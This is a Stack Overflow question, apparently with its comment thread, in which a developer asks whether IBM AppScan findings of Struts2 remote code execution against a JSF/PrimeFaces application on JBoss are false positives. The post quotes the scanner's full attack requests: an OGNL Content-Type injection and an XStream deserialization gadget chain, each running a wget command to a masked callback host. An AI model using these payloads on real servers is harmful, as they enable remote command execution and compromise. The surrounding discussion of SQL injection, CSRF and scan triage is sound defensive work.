0

We recently received result from IBM AppScan DAST and some of the result didn't make sense. The first 2 High issue shows the application as being Struts2 which is incorrect since it a JSF 2.2 , Primefaces 7.0.9 running on JBOSS EASP 7.2 (JSF version 2.3). I don't even seen Struts in JBOSS modules / jars.

1.High -- Apache Struts2 Remote Code Execution

Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents Fix: Upgrade to the latest version of Apache Struts

GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability

We were told we should check the Content-Type of request header. I have not come across any such in any of past DSAT. Has anyone done something like this before in JSF?

1.High -- Apache Struts2 REST Plugin XStream Remote Code Execution

POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>

Seems like response is HTTP/1.1 200 OK which AppScan believes is a vulnerability

Our web.xml has the error pages defined , client side state saving

<error-page>
        <error-code>404</error-code>
        <location>/error/404.xhtml</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <exception-type>java.lang.RuntimeException</exception-type>
        <location>/error/access.xhtml</location>
    </error-page>
    <error-page>
        <location>/error/error.xhtml</location>
    </error-page>

    <context-param>
        <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
        <param-value>client</param-value>
    </context-param>

Anyone who has seen similar issue from DSAT ? Could some of these be false positive? Looking for feedback and some insight.

Other Issue

Links CSRF, XSS and SQL Injection attack prevention in JSF

Rizwan
  • 103
  • 4
  • 24
Ravi
  • 391
  • 2
  • 18
  • Penetration tests like this often (I think almost every time) come with problems, related test cases, and some suggestions of the resolution, basically with everything you need, so first, check what IBM recommends (the Fix: part). About Struts, since you use for web services, check your version, if it has known vulnerabilities, same for your application server. Sql injection seems clear to fix since IBM report their test case. Same for Java Deserialization Code Execution, you're missing some escape or a sanitizer of your input. Then you have to enable CSRF and solve the other two issues. – WoAiNii May 08 '20 at 06:59
  • So, basically for the first four, you need to sanitize every input you receive, else someone can run an arbitrary script directly on your server. Then you have to enable CSRF and to add these two cookie parameters. But for every case, you have how to reproduce it and how to solve, directly from IBM, so read first that. – WoAiNii May 08 '20 at 07:13
  • Apache Struts2 Remote Code Execution and Apache Struts2 REST Plugin XStream Remote Code Execution was bit misleading. That for the advice on webservice since we do have JAXRS and JAXWS service. I tried to keep the above post compact but a lots of the http response we either session time or viewexipred exception and since the view state was client the response was truncated in report. – Ravi May 08 '20 at 12:12
  • w.r.t Blind SQL Injection (Time Based) analysis reports a note that "The first and third test responses were timed out and the second test response was received normally". This issue occurred at 3 instance will update based on the scenario. – Ravi May 08 '20 at 12:59
  • 2
    Personally I'd say these test results are bogus... So much unclearity in the feedback and wrong info based (imo) on old assumptions (all IBM's fault, not yours). And all the issues are so different that they do not belong in one question imo. Hard to respond/reply/comment. – Kukeltje May 08 '20 at 13:38
  • @Kukeltje i have been raking my brains for a week to get atleast once reproducible example that can prove a vulnerability exists in either JSF or primefaces or something that i can fix. over 3000 pages of report with 80% of the report for the first 2 Struts issue . not fun when appscan result need to be clean for go-no-go decision :( – Ravi May 08 '20 at 13:55
  • I tried to put a summary of issue here since i was not even sure if all the above issue truly represented a actual vulnerability just just because the AppScan report them. e.g. modify javax.faces.ViewState parameter , javax.faces.source parameter , checking CSR on javax.faces.resource – Ravi May 08 '20 at 14:04
  • and i have not even put the low issue which are asking me to add "Cache-Control: no-store" and "Pragma: no-cache" to javax.faces.resource/components.css and others ¯\_(ツ)_/¯ – Ravi May 08 '20 at 14:07
  • I miss something, they seem rather clear (maybe based on old assumption, but about some missing best practices), e.g. in SQL injection they referer to a specific field `form:propertyTree:0:j_idt126` and they said that they can use that to SQL inject your DB, it seems clear as an issue, how do you use that input in your query? Why do you say this isn't a vulnerability? As suggested, you could post single or relate ones per question, else is pretty hard to get an answer – WoAiNii May 08 '20 at 15:11
  • @WoAiNii i edited and added 2nd case for Blind SQL Injection (Time Based). In this case we do not use the parm V. i am checking for the form:propertyTree:0:j_idt126 issue. – Ravi May 08 '20 at 15:22
  • Ok, now that you have the field check\post how do you use it, in your query (what do you use hibernate/ibatis/other?). – WoAiNii May 08 '20 at 15:39
  • form:propertyTree:0:j_idt126 , attached an image . We use our own framework.It internally generates JDBC query using prepared statement for query that run against DB . – Ravi May 08 '20 at 16:00
  • [This](https://stackoverflow.com/questions/1812891/java-escape-string-to-prevent-sql-injection) could help for that. – WoAiNii May 08 '20 at 17:42
  • Yes , we are using 100% prepared statement – Ravi May 08 '20 at 18:10
  • https://owasp.org/www-community/attacks/Blind_SQL_Injection - The specific issue is the AppScan marks it our as a Time-based - Blind SQL. Time-based type of blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query executing. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic: If the first letter of the first database’s name is an ‘A’, wait for 10 seconds. If the first letter of the first database’s name is an ‘B’, wait for 10 seconds. etc. – Ravi May 08 '20 at 18:14
  • Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/213444/discussion-between-woainii-and-ravi). – WoAiNii May 08 '20 at 19:14
  • 1
    Please split down the question in multiple ones... focus... – Kukeltje May 09 '20 at 08:21
  • Is this serious: _" over 3000 pages of report with 80% of the report for the first 2 Struts issue ."_? – Kukeltje May 09 '20 at 08:28
  • Yes .. including request and response dumps in PDF with a response that is partial. will do split this to multiple questions. – Ravi May 09 '20 at 11:56
  • @Kukeltje i have split this post into 4 more questions. i will update each of them with more details. Keep this post for the 2 Struts issue. – Ravi May 10 '20 at 00:50

0 Answers0